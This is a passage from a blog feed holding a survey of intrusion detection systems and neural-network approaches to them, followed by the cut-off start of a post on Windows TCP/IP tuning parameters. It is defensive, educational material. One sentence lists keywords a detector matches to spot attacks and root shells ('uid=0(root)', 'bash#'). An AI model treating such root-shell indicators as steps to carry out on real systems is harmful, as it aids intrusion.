Intrusion Detection Systems, developing commercial and research tools, and a new way to improve false-alarm detection using Neural Network approach. This approach is still in development, nevertheless it seems to be very promising for the future.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This paper is organized as follows : first, we present the global architecture of IDS and a few commercially available tools, then we analyze new axes of research to improve IDS’s performances and particularly the application of Neural Networks to Intrusion Detection.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Classification of Intrusion Detection Systems&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A guidance document on Intrusion Detection Systems is available from National Institute of Standards and Technology ( NIST ) organization [1].&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems can be classified into three categories :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;host-based IDS, evaluate information found on a      single or multiple host systems, including contents of operating systems,      system and application files.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;network-based IDS, evaluate information captured      from network communications, analyzing the stream of packets traveling      across the network. Packets are captured through a set of sensors.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;vulnerability-assessment IDS, detect      vulnerabilities on internal networks and firewalls&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;There are two primary models to analyzing events to detect attacks:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;misuse detection model : IDS detect      intrusions by looking for activity that corresponds to known signatures of      intrusions or vulnerabilities&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;anomaly detection model : IDS detect      intrusions by searching « abnormal » network traffic&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Most IDS commercial tools refer to the misuse detection model, and signatures of intrusions must always be updated by vendors.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS based on anomaly detection model have the ability to detect symptoms of attacks without specifying model of attacks, but they are very sensitive to false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Commercially available tools&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;Jackson&lt;/st1:city&gt;&lt;/st1:place&gt; [2] of Los Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;suitability for IDS architecture and management      scheme&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;flexibility of adaptation for a specific network      to be monitored&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;protection against malicious tampering&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;interoperability with other network management      and security tools&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;comprehensiveness, to expand the concept of      intrusion detection such as blocking Java applets or Active-X controls,      monitoring e-mail content, blocking specific urls&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;event management, such as managing and reporting      event trace, updating attack database&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;active response when an attack occurs, such as      firewall or router reconfiguration&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;support for product&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Another recent market survey of commercially available Intrusion Detection tools today is available in [3]. We present here examples of IDS tools, classified according to the three models : host-based, network-based and vulnerability-assessment tools&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS systems detect attacks for an individual system, using system logs and operating system audit trials. Examples of well known host-based commercial tools are : Cybercop from Network Associates ( NAI ) ( http://www.pgp.com ), KaneSecurity Monitor ( KSM ) from RSA Security ( http://www.rsasecuriy.com ). Tripwire ( http://www.tripwire.org ) is a specific tool to detect changes of administrative or user files on one server.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS systems detect attacks by capturing and analyzing network packets, from « sensors » placed at various points in a network. Examples of well known Network-based commercial tools are : RealSecure from Internet Security Scanner ( ISS ) ( http://www.iss.net ), Cisco Secure IDS or NetRanger from Cisco Systems ( ex Wheel Group Corporation ), Centrax from CyberSafe corporation, and Network Flight Recorder NFR&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org )&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The main difficulty for Network-based IDS is to process in real-time all packets for a large network ; specific hardware solutions may be employed. Another problem is segmentation of networks by switches which involve difficulties in capturing traffic for a global network.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools are security scanners used to detect known vulnerabilities on specific Operating System’s configuration. Examples of well-known vulnerability-assessment tools are : CyberCop Scanner from PGP Security ( a Network Associates Division ) and SecureScan NX from Networks Vigilance ( formally known as NV e-secure ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. Deraison&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performances for commercial tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The majority of tools available today refer to the misuse detection model, meaning that administrators need to regularly update vulnerabilities database. Then, all these tools are vulnerable to new signatures of attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Tools are also very sensitive to false attacks, corresponding to normal network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Major commercial IDS do not handle Fragmentation / re-assembly of IP packets. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For large networks, it would be necessary to store Gigabytes of event data every day, to treat them off-line.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Application of Neural Networks to Intrusion Detection&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for misuse detection &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for the misuse detection model are :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;expert systems, containing a set of rules that      describe attacks&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;signature verification, where attack scenarios      are translated into sequences of audit events&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;petri nets, where known attacks are represented      with graphical petri nets&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;sate-transition diagrams, representing attacks      with a set of goals and transitions&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for misuse detection concerns « signature verification », where a system detects previously seen, known attacks by looking for an invariant signature left by these attacks. This signature is found in audit files, in host-intrused machine, or in sniffers looking for packets inside or outside of the attacked machine.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Limitation of this approach is due to :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;frequent false-alarm detection&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;the need to specify a signature of the attack,      and then to update signature of attacks on every IDS tool. A signature of      an attack may not be easily discovered.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;new attack signatures are not automatically      discovered without update of the IDS&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for anomaly detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Anomaly Detection in Network-based or Host-based IDS includes :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;threshold detection detecting abnormal      activity on the server or network, for example abnormal consumption of the      CPU for one server, or abnormal saturation of the network&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;statistical measures, learned from historical      values&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;rule-based measures, with expert systems&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;non-linear algorithms such as Neural Networks or      Genetic algorithms&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for anomaly detection concerns the statistical analysis, where the user or the system behavior is measured by a number of variables over the time. These variables may be the login and the logout time of each session, the amount of resources consumed during the session, and the resource duration. The major limitation of this approach is to find a correct threshold without frequent false-alarm detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;DARPA Intrusion Detection Data Base&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;To improve performances of IDS systems with real network traffic, a large-scale realistic Intrusion Detection data-base has been sponsored by the US Defense Advanced Research Projects Agency ( DARPA ) in 1998. More than two months of traffic observed from US Government sites and the Internet were registered, adding attacks against various hosts OS. DARPA data-base was then designed to evaluate performances of Intrusion Detection Systems. The first evaluation with off-line and real-time Data Base was conducted in the summer of 1998 [5].&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach for Intrusion Detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;One promising research in Intrusion Detection concerns the application of the Neural Network techniques, for the misuse detection model and the anomaly detection model. Performance evaluations presented in this paper all refer to the DARPA Intrusion Data Base.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;strong&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;An artificial Neural Network consists of a collection of treatments to transform a set of inputs to a set of searched outputs, through a set of simple processing units, or nodes and connections between them. Subsets of the units are input nodes, output nodes, and nodes between input and output form hidden layers ; the connection between two units has some weight, used to determine how much one unit will affect the other. Two types of architecture of Neural Networks can be distinguished :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Supervised training algorithms, where in the      learning phase, the network learns the desired output for a given input or      pattern. The well known architecture of supervised neural network is the      Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern      Recognition problems.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unsupervised training algorithms, where in the      learning phase, the network learns without specifying desired output.      Self-Organizing Maps ( SOM ) are popular unsupervised training      algorithms ; a SOM tries to find a topological mapping from the input      space to clusters. SOM are employed for classification problems.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A good introduction to Neural Networks is available in [6]. The most important property of a Neural Network is to automatically learn / retrain coefficients in the Neural Network according to data inputs and data outputs. Applying the Neural Network (NN) approach to Intrusion Detection, we first have to expose NN to normal data and to attacks to automatically adjust coefficients of the NN during the training phase. Performance tests are then conducted with real network traffic and attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Networks have been largely employed with success for complex problems such as Pattern Recognition, hand-written character recognition, Statistical Analysis. We present four recent studies on the application of the Neural Network approach to the scope of Intrusion Detection, both for the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt; Representation of a Perceptron with one Hidden Layer ( from [8] )&lt;/span&gt;&lt;br /&gt;&lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Georgia University neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The MLP prototype had these characteristics : 4 fully connected layers, 9 input nodes and 2 output nodes ( normal and attack ). With this prototype, they simulated specific attacks as ISS scans, SATAN scans and SYNFlood, and each attack was clearly identified through normal traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A MLP/SOM prototype was then designed to detect dispersed and possibly collaborative attacks. Neural Network was a feed-forward network with back-propagation learning. In the learning phase, Neural Network converged rapidly. Preliminary results with unsuccessful FTP login attempts where correctly identified as attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;MIT research in neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;R Lippmann and R Cunningham [8, 9] of the MIT Lincoln Laboratory also conducted tests applying Neural Networks to misuse detection model, by searching for attack-specific keywords in the network traffic. They used a Multi-Level Perceptron (MLP) to detect Unix-host attacks, and attacks to obtain root-privilege on a server. Generic keywords are selected to detect attack preparations and actions executed after.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A two-layer perceptron was designed with k input nodes, 2k hidden nodes and 2 outputs ( normal and attack ) ; backpropagation in the learning phase detects weights of the Neural Network. Good detection performance was obtained with 30 keywords to detect attacks, such as « cat &gt; », « uudecode » or new root shell (« uid=0(root) », « bash# »).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Applied to Shell source code with 7 shell-commands representing an attack, 17 out of 20 attacks were detected and one false alarm generated ; applied to C source code with 2 features, 68 of 73 attacks were detected and 4 false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;With the Neural Network approach, false alarms were reduced by two orders of magnitude ( to roughly one false alarm per day ) and they increased the detection rate to roughly 80 % with the DARPA data base. System could detect old as well as new attacks not included in the training data, and in a lesser extent attacks distributed across multiple sessions.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;UBILAB Laboratory&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Luc Girardin of the UBILAB laboratory [ 10, 11] also employed Self-Organizing Maps ( SOM ) to perform clustering of network traffic and detect attacks based upon Neural Network, associated with a visual approach of network traffic. SOM are employed to project network events on an appropriate 2D-space for visualization, and then they are displayed to the Network Administrator with a comprehensive view of traffic. Intrusions are then easily extracted from this view, by highlighting divergence from the norm with visual metaphors of network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Girardin tested this approach with success for the following attacks : IP spoofing, FTP password guessing, network scanning and network hopping ; log file systems are analyzed from firewalls. However, this approach needs a visual interpretation of network traffic by an administrator to detect attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Research of RST Corporation&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A Ghosh and A Schwartzbard [12] of Reliable Software Technologies Corp. used the Neural Network approach for the anomaly detection model by analyzing program behavior profiles for Intrusion Detection. Program behavior profiles are built by capturing system calls made by the program, to monitor the behavior of programs by noting irregularities in program behavior.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Their IDS was a single hidden layer Multi-Layer Perceptron (MLP) ; they also employed the so-called Lucky Bucket algorithm to keep in mind temporal memorization of recent abnormal events, by managing a counter : for a normal output, the counter tends to be zero, and for an anomaly the counter tends to be one.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performance for their system was tested with the DARPA data-base, including intrusive and non-intrusive sessions. Applied to anomaly detection, system detects with good performances known and new attacks ( 77 % of attacks where detected with 3 % of false alarms ), but application to misuse detection detects attacks with high false alarm rates, excluding usage for commercial use. In 1998, with the DARPA off-line IDS evaluation, the system successfully detected User-to-Root attacks composed of system-call sequences.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In order to improve the anomaly detection model, A Ghosh et al. [13] then tested Intrusion Detection to another topology of Neural Network, the Elman Network for recognizing recurrent features in program execution traces. An Elman Network is based on a feed-forward topology with the addition of context nodes retaining information from previous inputs. Applied to the DARPA database, the Elman Networks were able to detect 77 % of attacks with &lt;b&gt;no false alarm&lt;/b&gt;, improving results obtained with the MLP topology.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems are becoming largely employed as a fundamental Network Security system. Commercial tools available today have limitations in detecting real intrusions, and Neural Network is a efficient way to improve the performances of IDS systems which are based on the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-8107702510982510456?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8107702510982510456/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8107702510982510456' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8107702510982510456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8107702510982510456'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/application-of-neural-networks-to.html' title='Application of Neural Networks to Intrusion Detection'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4305897499541149229</id><published>2008-03-25T11:53:00.000-07:00</published><updated>2008-03-25T12:47:49.094-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>FAQ - Frequently asked questions about Network parameters optimized by SpeedConnec</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;Maximum Transmission Unit (MTU)&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;br /&gt;This is the default packet size that Windows uses to negotiate with. When a connection is opened between two computers, they must agree on an MTU. This is done by comparing MTUs and selecting the smaller of the two. If the MTU is set too large for routers that are between the computers, these routers then fragment this information into a packet size that the router can handle. This fragmentation can double the amount of time it takes to send a single packet. Windows has a built-in MTU Discovery that will adjust for this by sending out a packet that is marked as "Not Fragmentable". Then the router sends back an error to the computer saying that the packet was too large, and Windows then lowers the MTU until there are no more errors. If your ISP uses an MTU of 576, then every time you start a connection, Windows must adjust down to this value. Even though Windows automatically adjusts the packet size, it still takes it time to negotiate an acceptable MTU. By setting this value manually, you greatly reduce the amount of work that Windows must do to negotiate.&lt;br /&gt;&lt;br /&gt;&lt;a name="mss"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Maximum Segment Size (MSS) &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Maximum Segment Size defines the largest segment of data that the TCP stack is prepared to receive. When a connection is established, the two ends agree to use the smaller of each end's value. MSS is generally 40 bytes less than Maximum Transmission Unit, because 40 bytes are used for the TCP and IP headers.&lt;br /&gt;&lt;br /&gt;&lt;a name="rwin"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;TCP Receive Window Size (RWIN)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The TCP Receive Window Size is the amount of receive data (in bytes) that can be buffered at one time on a connection. The sending host can send only that amount of data before waiting for an acknowledgment and window update from the receiving host. A value that's too large will result in greater loss of data if packets are lost or damaged, and a value that's too small will slow down data transfer considerably, as each packet will have to be acknowledged before the next packet is sent. Matching the receive window to even increments of the MSS increases the percentage of full-sized TCP segments utilized during bulk data transmission.&lt;br /&gt;&lt;br /&gt;&lt;a name="ttl"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Time To Live (TTL)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter specifies the default Time To Live (TTL) value that is set in the header of outgoing IP packets. The TTL determines the maximum time that an IP packet can live in the network without reaching its destination. It is effectively a limit on the number of routers an IP packet can pass through before it is discarded.&lt;br /&gt;&lt;br /&gt;&lt;a name="kat"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Keep Alive Time &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Specifies how often to send session keepalive packets on active sessions. This will keep connections that have stalled during a particular download session from timing out. The minimum is 1 minute (60000 ms). Recommended setting is 10 minutes (600000 ms).&lt;br /&gt;&lt;br /&gt;&lt;a name="pmtuBHD"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Path MTU - Enable Black Hole Detect &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. ICMP (Internet Control Message Protocol) is defined in STD5, RFC 792. With this feature enabled, TCP will try to send segments without the Don't Fragment bit set if several re-transmissions of a segment go unacknowledged. If the segment is acknowledged as a result, the MTU will be decreased and the Don't Fragment bit will be set in future packets on the connection. Enabling black hole detection increases the maximum number of re-transmissions performed for a given segment. Setting this parameter when it is not needed can cause performance degradation. However, if the router is not sending back the ICMP messages, then PMTU Discovery will not work. This can cause an even greater loss of performance. PMTU Black Hole Detect is recommended to be disabled.&lt;br /&gt;&lt;br /&gt;&lt;a name="pmtuAD"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Path MTU - Enable Auto 